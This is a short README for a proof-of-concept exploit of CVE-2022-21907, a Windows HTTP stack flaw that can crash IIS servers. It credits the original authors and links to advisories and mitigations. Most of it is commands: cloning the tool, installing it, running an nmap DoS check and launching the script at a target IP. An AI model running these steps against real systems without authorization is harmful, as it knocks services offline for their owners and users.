CVE-2022-21907 - HTTP Protocol Stack Remote Code Execution Vulnerability

⚠️ For educational and authorized security research purposes only

Original Exploit Authors

Very grateful to the original PoC author NU11SECURITY and michelep

Description:

HTTP Protocol Stack Remote Code Execution Vulnerability. This vulnerability would cause a denial-of-service attack to a target system that has an IIS web server.

Step Guides

1. Install git, then clone the PoC from the github repository:

   sudo apt install git -y
   git clone https://github.com/asepsaepdin/CVE-2022-21907.git

2. Install the requirements using pip3 command:

   sudo apt install python3-pip -y
   cd CVE-2022-21907
   pip3 install -r requirements.txt

3. Check the presence of vulnerability of target machine using command:

   nmap -p 80 --script dos_iis_2022_21907 10.10.10.1

4. Then, run the PoC scripts using command:

   python3 CVE-2022-21907.py -i 10.10.1.10

   Notes: specify -i options with the target IP address

Credits

• https://nvd.nist.gov/vuln/detail/CVE-2022-21907#match-8257502
• https://www.exploit-db.com/exploits/51575
• https://github.com/mauricelambert/CVE-2022-21907
• https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC

Mitigations:

• https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907